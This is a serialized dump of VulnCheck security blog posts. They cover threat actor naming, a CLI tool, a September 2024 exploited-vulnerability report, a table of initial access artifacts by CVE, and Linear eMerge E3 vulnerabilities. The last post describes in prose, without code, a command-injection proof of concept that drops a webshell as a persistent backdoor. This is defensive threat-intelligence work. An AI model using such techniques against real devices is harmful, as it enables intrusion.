machine speeds.",[18,64330,64331],{},"Most intelligence sources from third-party providers require human interpretation, and aren't immediately actionable, leaving many cybersecurity platforms lacking the data to support an informed response.",[18,64333,64334],{},"Knowing your adversary means identifying the threat actors, how they operate, knowledge of their techniques and tactics, and knowing specifically their intentional impact.",[18,64336,64337],{},"Tracking threat actors is a challenge, given the inconsistent naming strategies across cybersecurity products. As such, integrating intelligence to provide end-users with real-time accuracy and visibility into the threat actor ecosystem is essential.",[18,64339,64340],{},"Here are the specific elements of threat actor intelligence that every cybersecurity product leader should consider:",[22,64342,64343,64349],{},[25,64344,64345,64348],{},[295,64346,64347],{},"VariableThreat Actor Naming:"," There are many different naming schemes for Threat Actors. Cybersecurity product vendors name threat actors using their own methodologies, which makes correlating their behaviors more challenging because there isn’t a global standard.",[25,64350,64351,64354],{},[295,64352,64353],{},"Normalizing Threat Actor Names:"," Product managers should look for ways to normalize the variable naming conventions leverage the MISP and MITRE conventions, synonyms and schemes from a credible intelligence provider. Product managers should have a working knowledge of how intelligence feeds with threat actor identification indicators can help enrich other data sets - and to be effective, it must be comprehensive. The good example of this is Fancy Bear, also known as G0007, PETROVITE, APT28, SNAKEMACKERAL, Swallowtail, Group 74, Senit and Sofacy to name a few. Lookups take time, so it's essential for product managers to streamline the experience for end-users by hosting complete data sets.",[18,64356,64357],{},"Here’s an example of what that should look like for optimal threat actor data query results:",[18,64359,64360],{},[68,64361],{":width":10862,"alt":64362,"src":64363},"cozy-bear","\u002Fblog\u002Foem-series-post-1\u002Fcozy-bear.png",[18,64365,64366,64369,64371],{},[295,64367,64368],{},"Relevant Market Use Case: Exposure and Attack Surface Management",[1823,64370],{},"\nWhile it’s certainly true based on the examples above that timely, accurate intelligence can reduce exposures in the attack surface in many ways - through both a platform that integrates intelligence, but also by way of just using the intelligence.",[18,64373,64374],{},"It’s also interesting to look at tools in the market, like EPM tools, where product teams are taking aggressive, proactive steps to enrich their output to further reduce the attack surface.",[18,64376,64377,64382],{},[47,64378,64381],{"href":64379,"rel":64380},"https:\u002F\u002Fwww.sevcosecurity.com",[51],"Sevco Security"," is truly one of the leaders in the ASM market - in addition to the vulnerability prioritization and exposure management market - who is using data from VulnCheck in its platform.",[18,64384,64385],{},"Sevco enables security teams to find security gaps in their environment and see both exhaustive exploit intelligence on the vulnerabilities detected and comprehensive intelligence on the assets affected – their criticality to operations, the users who access them, the other controls present to protect them.",[18,64387,64388,64389,64393,64394,982,64397,59],{},"Sevco is taking a unique approach to helping their customers reduce exposure to emerging threats with VulnCheck by integrating ",[47,64390,64392],{"href":40745,"rel":64391},[51],"VulnCheck’s Community Tier solutions"," - notably our ",[47,64395,40672],{"href":40670,"rel":64396},[51],[47,64398,1233],{"href":2871,"rel":64399},[51],[18,64401,64402],{},"Why is Sevco a good example? First, they’ve figured out a very smart way to ingest VulnCheck’s intelligence into their platform to enrich their own data for customers, for example, with our KEV feed that features 200% more known exploited vulnerabilities than CISA KEV. VulnCheck’s data is refreshed continuously so known exploited vulnerabilities from this single feed are instantly available in the Sevco product, and scored by Sevco.",[18,64404,64405],{},"However, starting with a CVE in this intelligence feed is a great starting point to get closer to the root of the exploitation. What product teams are building is the entire story of that CVE, complete with patterns, a full data set and the ability to surface an impact analysis.",[18,64407,64408],{},"The screenshot below shows the added enrichment VulnCheck delivers directly in the Sevco platform that clearly adds a level of timeliness to VulnCheck’s data correlation of intelligence that’s collected, and then recombined into machine-readable feeds.",[18,64410,64411],{},[68,64412],{":width":10862,"alt":64413,"src":64414},"sevco-platform","\u002Fblog\u002Foem-series-post-1\u002Fsevco-platform.png",[18,64416,64417],{},"What is cool about this view that shows a demonstrable reduction in attack surface with VulnCheck’s exploit intelligence inside the Sevco platform that:",[1789,64419,64420,64423,64426,64429,64432],{},[25,64421,64422],{},"Drills down on a single CVE in the Sevco platform, users get a unified view with context of managing exposures.",[25,64424,64425],{},"Shows affected devices with any given CVE.",[25,64427,64428],{},"The severity levels and the overall scoring of a particular CVE based on the CVSS, EPSS and then exploit maturity and weaponization.",[25,64430,64431],{},"MITRE attack techniques in what’s identified.",[25,64433,64434],{},"Exploit intelligence where vulnerabilities are identified as exploited in the wild.",[18,64436,64437],{},"In summary, there are many factors that go into selecting intelligence sources to enrich cybersecurity products so that enterprise teams can track toward continuous improvement to drive better, faster data into their products.",[18,64439,64440],{},"Sevco integrates VulnCheck intelligence and combines it with asset criticality, business context and other signals unique to the organization that essentially become ‘asset intelligence’ for the end-user. Its a great combination of vulnerability and exploit intelligence with the complete picture of device and user inventory that delivers a holistic view of the risk unpatched vulnerabilities pose to an organization's environment.",[18,64442,64443],{},"This is the first in a series of examples of how product organizations should be looking to add intelligence across many different classes of cybersecurity platforms and across multiple intelligence-based use cases.",[44317,64445],{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":64447},[],"2024-10-23","OEM Use Case Series: Reducing Attack Surface Risk - Know Who Your Adversaries Are and How Naming Conventions Matter in Vulnerability Management",{"slug":64451},"reducing-attack-surface-risk-oem-series","\u002Fblog\u002Freducing-attack-surface-risk-oem-series",{"title":64277,"description":64449},{"title":64455,"color":64456,"icon":64457},"For Cybersecurity Product Teams","emerald","i-mdi-book-open-variant-outline","blog\u002Freducing-attack-surface-risk-oem-series","n2BEK9qI8Bszcs8jeZ71Sj9AgS7NvKdVrBwo1z1WjFk",{"id":64461,"title":64462,"articles":7,"authors":64463,"body":64465,"date":62926,"description":64554,"extension":234,"image":7,"link":7,"meta":64555,"navigation":237,"path":64557,"seo":64558,"series":7,"stem":64559,"subtype":7,"tags":64560,"__hash__":64561},"blog\u002Fblog\u002Fvulncheck-cli-anywhere.md","Bring VulnCheck Anywhere w\u002F VulnCheck CLI",[64464],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":64466,"toc":64547},[64467,64470,64474,64477,64482,64486,64489,64495,64499,64506,64512,64516,64529,64536,64538,64540,64542],[18,64468,64469],{},"VulnCheck delivers intelligence to the command line with VulnCheck’s new open source tool, VulnCheck CLI. VulnCheck customers and community members can now access VulnCheck intelligence through CLI across MacOS, Linux and Windows platforms. Browse VulnCheck indices, manage backups and access VulnCheck IP Intelligence offline using a terminal.",[61,64471,64473],{"id":64472},"simplified-interaction-w-vulncheck","Simplified Interaction w\u002F VulnCheck",[18,64475,64476],{},"Eliminate the need to write your own scripts to lookup VulnCheck data using a CLI. The VulnCheck CLI reduces effort by providing seamless access to vulnerability, exploit, and IP intelligence directly from the command line.",[18,64478,64479],{},[68,64480],{":width":10862,"alt":23340,"src":64481},"\u002Fblog\u002Fvulncheck-cli-anywhere\u002Fexploits.png",[61,64483,64485],{"id":64484},"faster-access-and-processing","Faster Access and Processing",[18,64487,64488],{},"Speed up workflows with local copies of VulnCheck data. Download VulnCheck locally to process data faster and more efficiently without requiring thousands of API calls.",[18,64490,64491],{},[68,64492],{":width":10862,"alt":64493,"src":64494},"VulnCheck Backup","\u002Fblog\u002Fvulncheck-cli-anywhere\u002Fdownload-backup.png",[61,64496,64498],{"id":64497},"offline-access-to-vulncheck-intelligence","Offline Access to VulnCheck Intelligence",[18,64500,64501,64502,59],{},"Use VulnCheck IP intelligence in restricted or disconnected environments, such as an air-gapped network or government SCIF, where internet access is unavailable, restricted, or untrusted. Learn more about using VulnCheck Offline CLI for IP Intel ",[47,64503,305],{"href":64504,"rel":64505},"https:\u002F\u002Fdocs.vulncheck.com\u002Ftools\u002Fcli\u002Foffline",[51],[18,64507,64508],{},[68,64509],{":width":10862,"alt":64510,"src":64511},"VulnCheck Offline Intelligene","\u002Fblog\u002Fvulncheck-cli-anywhere\u002Foffline-backup.png",[61,64513,64515],{"id":64514},"how-can-i-learn-more-about-vulncheck-cli","How can I learn more about VulnCheck CLI",[18,64517,64518,64519,64523,64524,59],{},"The VulnCheck CLI is available on ",[47,64520,2485],{"href":64521,"rel":64522},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcli",[51]," and can be easily ",[47,64525,64528],{"href":64526,"rel":64527},"https:\u002F\u002Fdocs.vulncheck.com\u002Ftools\u002Fcli\u002Fintroduction#how-can-i-access-vulncheck-cli",[51],"installed on MacOS, Linux and Windows",[18,64530,64531,64532,59],{},"A list of example CLI commands is available ",[47,64533,305],{"href":64534,"rel":64535},"https:\u002F\u002Fdocs.vulncheck.com\u002Ftools\u002Fcli\u002Fexamples",[51],[61,64537,202],{"id":201},[18,64539,205],{},[18,64541,208],{},[18,64543,211,64544,217],{},[47,64545,216],{"href":214,"rel":64546},[51],{"title":219,"searchDepth":220,"depth":220,"links":64548},[64549,64550,64551,64552,64553],{"id":64472,"depth":220,"text":64473},{"id":64484,"depth":220,"text":64485},{"id":64497,"depth":220,"text":64498},{"id":64514,"depth":220,"text":64515},{"id":201,"depth":220,"text":202},"VulnCheck delivers intelligence to the command line with VulnCheck’s new open source tool, VulnCheck CLI.",{"slug":64556},"vulncheck-cli-anywhere","\u002Fblog\u002Fvulncheck-cli-anywhere",{"title":64462,"description":64554},"blog\u002Fvulncheck-cli-anywhere",[33173,23275],"taCHylB15XV_6LXoErj06Vqsicf1g1H2x4RR_wUHUD4",{"id":64563,"title":64564,"articles":64565,"authors":64569,"body":64571,"date":64693,"description":57889,"extension":234,"image":7,"link":7,"meta":64694,"navigation":237,"path":64696,"seo":64697,"series":7,"stem":64698,"subtype":7,"tags":64699,"__hash__":64700},"blog\u002Fblog\u002Fkev-report-september-2024.md","VulnCheck Exploited Vulnerabilities Report - September 2024",[64566],{"title":64567,"source":61436,"link":64568,"date":62770},"Risky Biz News: China says the US is framing other countries for espionage operations","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-china-says-the-us-is-framing-other-countries-for-espionage-operations\u002F",[64570],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":64572,"toc":64690},[64573,64582,64584,64598,64602,64607,64610,64613,64617,64622,64625,64628,64632,64637,64640,64643,64647,64652,64655,64662,64666,64679,64681,64683,64685],[18,64574,64575,64576,64581],{},"In September, VulnCheck identified evidence of 78 CVEs that were publicly disclosed for the first time as exploited in the wild. The disclosure of known exploited vulnerabilities was from 21 different sources including a detailed ",[47,64577,64580],{"href":64578,"rel":64579},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fflax-typhoon-botnet",[51],"flax typhoon botnet report from the five eyes agencies"," which we covered in detail last month.",[1920,64583,20],{"id":3520},[22,64585,64586,64589,64592,64595],{},[25,64587,64588],{},"In September, VulnCheck identified 78 CVEs that were publicly disclosed for the first time as exploited in the wild",[25,64590,64591],{},"Software \u002F Product Categories that topped the list included Network Edge Devices, Open Source Software, Server Software and Desktop Applications.",[25,64593,64594],{},"29.5% of September’s KEVs had exploitation evidence within one month of their CVE publication date, while 53.9% were exploited within a year.",[25,64596,64597],{},"As of October 9th, 9 of the 78 Known Exploited Vulnerabilities are still awaiting analysis by NIST NVD.",[1920,64599,64601],{"id":64600},"september-product-categories-and-vendors","September Product Categories and Vendors",[18,64603,64604],{},[68,64605],{":width":10862,"alt":58618,"src":64606},"\u002Fblog\u002Fkev-report-september-2024\u002Fvulncheck-kev-september-categories.png",[18,64608,64609],{},"In September, I explored the product categories and vendors associated with known exploitation disclosed during the month. The top targeted categories were Network Edge Devices (28.2%), Open Source Software (16.7%), and Service Software (12.8%).",[18,64611,64612],{},"Network Edge Devices, consistently targeted by threat actors, highlight the importance of maintaining timely patch management processes, especially for internet-facing devices like network routers, modems and firewalls.",[1920,64614,64616],{"id":64615},"who-reported-known-exploited-vulnerabilities","Who Reported Known Exploited Vulnerabilities",[18,64618,64619],{},[68,64620],{":width":10862,"alt":58618,"src":64621},"\u002Fblog\u002Fkev-report-september-2024\u002Fsept-kev-source.png",[18,64623,64624],{},"In September, 21 different sources disclosed known exploited vulnerabilities (KEVs). Notably, the Five Eyes agencies released a detailed report on the Flax Typhoon botnet, uncovering exploitation evidence for 25 CVEs that previously lacked public reports of exploitation.",[18,64626,64627],{},"Shadowserver has shown a noticeable increase in disclosed exploitation activity. Additionally, CISA KEV added four older vulnerabilities in September from Draytek, Oracle (2), and SAP, marking the first public exploitation evidence for these products.",[1920,64629,64631],{"id":64630},"time-to-publicly-reported-exploitation","Time to Publicly Reported Exploitation",[18,64633,64634],{},[68,64635],{":width":10862,"alt":58618,"src":64636},"\u002Fblog\u002Fkev-report-september-2024\u002Ftime-to-exploitation.png",[18,64638,64639],{},"A common question is: How quickly are known vulnerabilities exploited? To explore this, we analyzed 78 known exploited vulnerabilities (KEVs), comparing the time between their NVD publication and public reports of exploitation.",[18,64641,64642],{},"Our findings show that 29.5% of September’s KEVs had exploitation evidence within one month of their CVE publication, while 53.9% were exploited within a year. We plan to expand this research to cover a broader set of KEVs for deeper insights in the future on time to exploitation.",[1920,64644,64646],{"id":64645},"a-look-at-septembers-known-exploited-vulnerabilities-mapped-to-scoring-system","A look at September’s Known Exploited Vulnerabilities Mapped to Scoring System",[18,64648,64649],{},[68,64650],{":width":10862,"alt":58618,"src":64651},"\u002Fblog\u002Fkev-report-september-2024\u002Fsept-kev-epss-cvss.png",[18,64653,64654],{},"We've continued to analyze Known Exploitation in relation to vulnerability scoring systems, specifically CVSS and EPSS. Our goal is to provide insights into how these scoring systems can better reflect known exploitation and emerging threats. To enhance visibility into CVSS and EPSS, I created a plot of known exploitation mapped to these systems. Yellow indicates higher density, while purple represents lower density of CVEs associated with known exploitation. By applying an EPSS score (Early October scoring) of 0.1 or a 10% probability of exploitation or higher, we find that 20 CVEs (25.6%) align with Known Exploitation captured for the first time during June, July and August. With a CVSS-BT score of 9 or higher, 36 CVEs (46.1%) map to Known Exploitation. We plan to explore scoring systems further to provide deeper insights when we have more time.",[18,64656,64657,64658,59],{},"Related to the topic of vulnerability prioritization, we suggest exploring: ",[47,64659,64661],{"href":54458,"rel":64660},[51],"Taking an Evidence Based Approach to Prioritization",[1920,64663,64665],{"id":64664},"access-vulncheck-known-exploited-vulnerabilities-kev-catalog","Access VulnCheck Known Exploited Vulnerabilities (KEV) Catalog",[18,64667,64668,64669,64672,64673,982,64676,59],{},"For those eager to dive deeper into known exploited vulnerabilities, you can start by utilizing ",[47,64670,28667],{"href":40745,"rel":64671},[51]," a free resource including ",[47,64674,1233],{"href":2871,"rel":64675},[51],[47,64677,40672],{"href":40670,"rel":64678},[51],[61,64680,202],{"id":201},[18,64682,205],{},[18,64684,208],{},[18,64686,211,64687,217],{},[47,64688,216],{"href":214,"rel":64689},[51],{"title":219,"searchDepth":220,"depth":220,"links":64691},[64692],{"id":201,"depth":220,"text":202},"2024-10-13",{"slug":64695},"kev-report-september-2024","\u002Fblog\u002Fkev-report-september-2024",{"title":64564,"description":57889},"blog\u002Fkev-report-september-2024",[1279],"acehQiewcYGmiYhWxoEEzpCf-e0EmmJNntHd_VYptoU",{"id":64702,"title":64703,"articles":7,"authors":64704,"body":64706,"date":62705,"description":65159,"extension":234,"image":7,"link":7,"meta":65160,"navigation":237,"path":65162,"seo":65163,"series":7,"stem":65164,"subtype":7,"tags":65165,"__hash__":65166},"blog\u002Fblog\u002Finitial-access-intelligence-september-2024.md","VulnCheck Initial Access Intelligence Update - September 2024",[64705],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":64707,"toc":65154},[64708,64710,64713,64720,64726,64729,64746,64750,65139,65141,65147,65149],[18,64709,59412],{},[18,64711,64712],{},"In September 2024, VulnCheck crossed 290+ Initial Access Intelligence (IAI) artifacts, developing artifacts for 16 CVEs, covering 14 different vendors and products. 7 of the 14 have confirmed exploitation activity as of October 7th, 2024.",[18,64714,64715,64716,64719],{},"Notably, we added IAI coverage for CVE-2023-50386, CVE-2019-7256, and CVE-2023-35843 which were discovered to be a target of the recently reported ",[47,64717,62506],{"href":62504,"rel":64718},[51]," and continue to expand our coverage of the CVEs targeted by this botnet.",[18,64721,64722],{},[68,64723],{":width":10862,"alt":64724,"src":64725},"Initial Access Intelligence - September 2024","\u002Fblog\u002Finitial-access-intelligence-september-2024\u002Finitial-access-september-2024.png",[18,64727,64728],{},"To provide better visibility into these updates, we’ve broken down September’s Initial Access Intelligence Artifacts by CVE. For each CVE, we provide a range of detection tools including:",[22,64730,64731,64733,64735,64737,64739,64741,64743],{},[25,64732,325],{},[25,64734,59440],{},[25,64736,59443],{},[25,64738,59446],{},[25,64740,59449],{},[25,64742,59452],{},[25,64744,64745],{},"Greynoise\u002FCensys\u002FShodan queries",[61,64747,64749],{"id":64748},"september-2024-initial-access-artifacts","September 2024 Initial Access Artifacts",[307,64751,64752,64774],{},[310,64753,64754],{},[313,64755,64756,64758,64760,64762,64764,64766,64768,64770,64772],{},[316,64757,59471],{},[316,64759,59474],{},[316,64761,319],{},[316,64763,59479],{},[316,64765,59482],{},[316,64767,59485],{},[316,64769,59488],{},[316,64771,61654],{},[316,64773,61657],{},[336,64775,64776,64799,64821,64844,64867,64890,64913,64935,64957,64980,65003,65026,65048,65071,65093,65116],{},[313,64777,64778,64781,64784,64787,64789,64791,64793,64795,64797],{},[341,64779,64780],{},"Traccar Image Upload Path Traversal RCE",[341,64782,64783],{},"2024-09-05",[341,64785,64786],{},"CVE-2024-24809",[341,64788,59510],{},[341,64790,59510],{},[341,64792,59510],{},[341,64794,59510],{},[341,64796,59510],{},[341,64798],{},[313,64800,64801,64804,64806,64809,64811,64813,64815,64817,64819],{},[341,64802,64803],{},"Traccar Unrestricted File Upload",[341,64805,64783],{},[341,64807,64808],{},"CVE-2024-31214",[341,64810,59510],{},[341,64812,59510],{},[341,64814,59510],{},[341,64816,59510],{},[341,64818,59510],{},[341,64820],{},[313,64822,64823,64826,64829,64832,64834,64836,64838,64840,64842],{},[341,64824,64825],{},"GiveWP Remote Code Execution",[341,64827,64828],{},"2024-09-06",[341,64830,64831],{},"CVE-2024-5932",[341,64833,59510],{},[341,64835,59510],{},[341,64837,59510],{},[341,64839,59510],{},[341,64841,59510],{},[341,64843],{},[313,64845,64846,64849,64852,64855,64857,64859,64861,64863,64865],{},[341,64847,64848],{},"Apache OFBiz CSV Data File Webshell",[341,64850,64851],{},"2024-09-10",[341,64853,64854],{},"CVE-2024-45195",[341,64856,59510],{},[341,64858,59510],{},[341,64860,59510],{},[341,64862,59510],{},[341,64864,59510],{},[341,64866,59510],{},[313,64868,64869,64872,64875,64878,64880,64882,64884,64886,64888],{},[341,64870,64871],{},"Zyxel nebula_ap_redirect Crash",[341,64873,64874],{},"2024-09-11",[341,64876,64877],{},"CVE-2024-7261",[341,64879],{},[341,64881],{},[341,64883,59510],{},[341,64885,59510],{},[341,64887,59510],{},[341,64889],{},[313,64891,64892,64895,64898,64901,64903,64905,64907,64909,64911],{},[341,64893,64894],{},"ssssssss Spider Flow Command Injection",[341,64896,64897],{},"2024-09-12",[341,64899,64900],{},"CVE-2024-0195",[341,64902,59510],{},[341,64904,59510],{},[341,64906,59510],{},[341,64908,59510],{},[341,64910,59510],{},[341,64912],{},[313,64914,64915,64918,64920,64923,64925,64927,64929,64931,64933],{},[341,64916,64917],{},"Zyxel NAS Auth Bypass and Configuration Leak",[341,64919,64897],{},[341,64921,64922],{},"CVE-2024-6342",[341,64924,59510],{},[341,64926,59510],{},[341,64928,59510],{},[341,64930,59510],{},[341,64932,59510],{},[341,64934],{},[313,64936,64937,64940,64942,64945,64947,64949,64951,64953,64955],{},[341,64938,64939],{},"SPIP Bigup Plugin Remote Code Execution",[341,64941,64897],{},[341,64943,64944],{},"CVE-2024-8517",[341,64946,59510],{},[341,64948,59510],{},[341,64950,59510],{},[341,64952,59510],{},[341,64954,59510],{},[341,64956],{},[313,64958,64959,64962,64965,64968,64970,64972,64974,64976,64978],{},[341,64960,64961],{},"Apache OFBiz Stats Screen SSRF",[341,64963,64964],{},"2024-09-18",[341,64966,64967],{},"CVE-2024-45507",[341,64969,59510],{},[341,64971,59510],{},[341,64973,59510],{},[341,64975,59510],{},[341,64977,59510],{},[341,64979],{},[313,64981,64982,64985,64988,64991,64993,64995,64997,64999,65001],{},[341,64983,64984],{},"Progress WhatsUp Gold SQL Injection",[341,64986,64987],{},"2024-09-20",[341,64989,64990],{},"CVE-2024-6670",[341,64992,59510],{},[341,64994,59510],{},[341,64996,59510],{},[341,64998,59510],{},[341,65000,59510],{},[341,65002],{},[313,65004,65005,65008,65011,65014,65016,65018,65020,65022,65024],{},[341,65006,65007],{},"Sudo Heap-based Overflow \"Baron Samedit\" Local Privilege Escalation",[341,65009,65010],{},"2024-09-25",[341,65012,65013],{},"CVE-2021-3156",[341,65015,59510],{},[341,65017,59510],{},[341,65019],{},[341,65021],{},[341,65023],{},[341,65025],{},[313,65027,65028,65031,65033,65036,65038,65040,65042,65044,65046],{},[341,65029,65030],{},"Apache Solr Configuration Backup RCE",[341,65032,65010],{},[341,65034,65035],{},"CVE-2023-50386",[341,65037,59510],{},[341,65039,59510],{},[341,65041,59510],{},[341,65043,59510],{},[341,65045,59510],{},[341,65047,59510],{},[313,65049,65050,65053,65056,65059,65061,65063,65065,65067,65069],{},[341,65051,65052],{},"Linear eMerge e3-Series ReaderNo Command Injection",[341,65054,65055],{},"2024-09-26",[341,65057,65058],{},"CVE-2019-7256",[341,65060],{},[341,65062],{},[341,65064,59510],{},[341,65066,59510],{},[341,65068,59510],{},[341,65070],{},[313,65072,65073,65076,65078,65081,65083,65085,65087,65089,65091],{},[341,65074,65075],{},"Spring Cloud Data Flow Remote Code Execution",[341,65077,65055],{},[341,65079,65080],{},"CVE-2024-37084",[341,65082,59510],{},[341,65084,59510],{},[341,65086,59510],{},[341,65088],{},[341,65090],{},[341,65092],{},[313,65094,65095,65098,65101,65104,65106,65108,65110,65112,65114],{},[341,65096,65097],{},"NocoDB Path Traversal",[341,65099,65100],{},"2024-09-27",[341,65102,65103],{},"CVE-2023-35843",[341,65105,59510],{},[341,65107],{},[341,65109,59510],{},[341,65111,59510],{},[341,65113,59510],{},[341,65115],{},[313,65117,65118,65121,65124,65127,65129,65131,65133,65135,65137],{},[341,65119,65120],{},"Zimbra RCPT TO Command Injection",[341,65122,65123],{},"2024-09-30",[341,65125,65126],{},"CVE-2024-45519",[341,65128,59510],{},[341,65130,59510],{},[341,65132,59510],{},[341,65134,59510],{},[341,65136,59510],{},[341,65138,59510],{},[61,65140,59830],{"id":59829},[18,65142,65143,65144,59],{},"VulnCheck's exploit proof of concept (PoC) and version scanner code is written in the Go programming language. They are provided with a Dockerfile for ease of use. The exploits leverage an Open Source Software (OSS) shared library, which VulnCheck has authored and maintains, called ",[47,65145,20558],{"href":14297,"rel":65146},[51],[61,65148,59851],{"id":59850},[18,65150,59854,65151],{},[47,65152,59857],{"href":59857,"rel":65153},[51],{"title":219,"searchDepth":220,"depth":220,"links":65155},[65156,65157,65158],{"id":64748,"depth":220,"text":64749},{"id":59829,"depth":220,"text":59830},{"id":59850,"depth":220,"text":59851},"In September 2024, we developed new Initial Access Intelligence (IAI) artifacts for 16 CVEs, covering 14 different vendors and products.",{"slug":65161},"initial-access-intelligence-september-2024","\u002Fblog\u002Finitial-access-intelligence-september-2024",{"title":64703,"description":65159},"blog\u002Finitial-access-intelligence-september-2024",[1281],"IrV6O5D3RWy82GZZi0k5ps2XJpjEwc_NXwgbzExItjU",{"id":65168,"title":65169,"articles":65170,"authors":65185,"body":65187,"date":65331,"description":65332,"extension":234,"image":7,"link":7,"meta":65333,"navigation":237,"path":65335,"seo":65336,"series":7,"stem":65337,"subtype":7,"tags":65338,"__hash__":65339},"blog\u002Fblog\u002Fflax-typhoon-linear-merge.md","Following the Trail of Flax Typhoon to Uncover Newly Discovered Vulnerabilities in Linear Emerge Access Control Devices",[65171,65175,65179,65182],{"title":65172,"source":14382,"link":65173,"date":65174},"Experts Warn of Critical Unpatched Vulnerability in Linear eMerge E3 Systems","https:\u002F\u002Fthehackernews.com\u002F2024\u002F10\u002Fexperts-warn-of-critical-unpatched.html","2024-10-10",{"title":65176,"source":43752,"link":65177,"date":65178},"Critical Nortek Linear eMerge Flaw Still Unaddressed","https:\u002F\u002Fwww.channele2e.com\u002Fbrief\u002Fcritical-nortek-linear-emerge-flaw-still-unaddressed","2024-10-11",{"title":65180,"source":61436,"link":65181,"date":65178},"Risky Biz News: Dutch government to physically replace tens of thousands of hackable traffic lights","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-dutch-government-to-manually-replace-tens-of-thousands-of-hackable-traffic-lights\u002F",{"title":65183,"source":11233,"link":65184,"date":65178},"Critical Nortek Linear eMerge E3 system flaw remains unaddressed","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fcritical-nortek-linear-emerge-e3-system-flaw-remains-unaddressed",[65186],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":65188,"toc":65322},[65189,65191,65205,65209,65214,65216,65218,65222,65230,65233,65237,65240,65245,65248,65253,65257,65260,65266,65269,65273,65276,65279,65284,65287,65289,65292,65302,65305,65307],[1920,65190,20],{"id":3520},[22,65192,65193,65196,65199,65202],{},[25,65194,65195],{},"A newly disclosed vulnerability, CVE-2024-9441, affects the Linear Emerge E3 series.",[25,65197,65198],{},"The vulnerability has not yet been patched by the vendor, and exploits are already circulating, raising concerns of imminent exploitation.",[25,65200,65201],{},"The same device was previously targeted by the Flax Typhoon botnet using older vulnerabilities like CVE-2019-7256, but recent investigations show few real devices remain vulnerable.",[25,65203,65204],{},"We’ve published proof-of-concept exploits, a CVE for CVE-2024-9441, and detection artifacts to aid defenders.",[61,65206,65208],{"id":65207},"video-walkthrough-exploring-linear-emerge-vulnerabilities","Video Walkthrough: Exploring Linear Emerge Vulnerabilities",[59905,65210],{"width":65211,"height":65212,"src":65213,"title":59911,"frameBorder":445,"allow":59907,"referrerPolicy":59909,"allowFullScreen":237},560,315,"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FD4ATPmVWXKs?si=ZBwdnypGfE19BvFy",[1823,65215],{},[1823,65217],{},[61,65219,65221],{"id":65220},"introduction-to-linear-emerge-vulnerabilities","Introduction to Linear Emerge Vulnerabilities",[18,65223,65224,65225,65229],{},"In the past few weeks, we’ve been closely watching the Linear Emerge E3 series, and for good reason. It became a target of interest after the ",[47,65226,65228],{"href":64578,"rel":65227},[51],"Flax Typhoon botnet"," was found exploiting CVE-2019-7256, a vulnerability that’s been on the radar since 2020. However, just as we began to see few real devices online vulnerable to this older CVE, a new threat emerged, CVE-2024-9441.",[18,65231,65232],{},"Unlike CVE-2019-7256, the new CVE has yet to be patched by the vendor, and SSD Disclosure recently published a working exploit without a corresponding CVE. We took it upon ourselves at VulnCheck to issue CVE-2024-9441 and develop our own proof-of-concept exploit, knowing full well that it could become a significant problem in the near future.",[61,65234,65236],{"id":65235},"exploiting-the-flax-typhoon-targeted-vulnerability","Exploiting the Flax Typhoon Targeted Vulnerability",[18,65238,65239],{},"Initially, we turned to Shodan and Nuclei templates to see how many devices were still vulnerable to the older CVE-2019-7256. A quick query returned nearly 12,000 results, seemingly a massive number. But after digging deeper, it turned out that roughly 10,000 of those were honeypots, leaving us with far fewer real-world vulnerable devices.",[18,65241,65242],{},[68,65243],{":width":10862,"alt":63425,"src":65244},"\u002Fblog\u002Fflax-typhoon-linear-merge\u002Flinear-emerge-shodan.png",[18,65246,65247],{},"After filtering and analyzing the data, we found only a handful of actual devices remained online and vulnerable. This was a good sign the Flax Typhoon botnet no longer had as many exposed targets.",[18,65249,65250],{},[68,65251],{":width":10862,"alt":63425,"src":65252},"\u002Fblog\u002Fflax-typhoon-linear-merge\u002Flinear-emerge-shodan-refined.png",[61,65254,65256],{"id":65255},"a-new-vulnerability-discovered-cve-2024-9441","A New Vulnerability Discovered: CVE-2024-9441",[18,65258,65259],{},"Just as we were wrapping up our investigation into CVE-2019-7256, SSD Disclosure dropped an advisory about a new vulnerability in the Linear Emerge E3 series. This OS command injection vulnerability, CVE-2024-9441, has not been patched, and SSD released an exploit without issuing a corresponding CVE.",[18,65261,65262],{},[68,65263],{":width":10862,"alt":65264,"src":65265},"Linear Emerge CVE Record","\u002Fblog\u002Fflax-typhoon-linear-merge\u002Flinear-emerge-cve-record.png",[18,65267,65268],{},"Seeing the need for proper tracking, we issued CVE-2024-9441 ourselves and built a proof-of-concept exploit. The very next day, a second exploit appeared on GitHub, indicating that the vulnerability was already attracting attention. While there have been no confirmed reports of in-the-wild exploitation, we suspect it’s only a matter of time.",[61,65270,65272],{"id":65271},"proof-of-concept-cve-2024-9441","Proof of Concept: CVE-2024-9441",[18,65274,65275],{},"The vulnerability allows for OS command injection, giving attackers the ability to execute commands as the web server user. In our proof of concept, we used a simple command injection technique to write commands to disk via an ampersand and echo.",[18,65277,65278],{},"Instead of deploying a reverse shell, we dropped a webshell. Why a webshell? On embedded devices like those in the E3 series, webshells provide a persistent foothold for attackers, allowing them to return at will. One limitation we found is that the webshell needs to live in an index.html file to be picked up by the web server, which makes it slightly more detectable. However, once deployed, it becomes a potent backdoor.",[18,65280,65281],{},[68,65282],{":width":10862,"alt":63425,"src":65283},"\u002Fblog\u002Fflax-typhoon-linear-merge\u002Flinear-emerge-exploit.png",[18,65285,65286],{},"We provided our customers with detection signatures to help them identify the vulnerability in their environments. But given the vendor’s slow response to the previous CVE-2019-7256, we don’t expect a patch for CVE-2024-9441 any time soon. Organizations using the Linear Emerge E3 series should act quickly to take these devices offline or isolate them.",[61,65288,63433],{"id":63432},[18,65290,65291],{},"CVE-2024-9441 is a new and emerging threat, and based on the attention it’s already received from exploit developers, it’s likely to be leveraged by threat actors soon. Without a vendor patch on the horizon, the best course of action is to take immediate steps to mitigate the risk:",[22,65293,65294,65297,65299],{},[25,65295,65296],{},"If your organization uses the Linear Emerge E3 series, ensure that these devices are removed from the network or isolated.",[25,65298,63444],{},[25,65300,65301],{},"Keep an eye on future advisories for this series, as we expect further 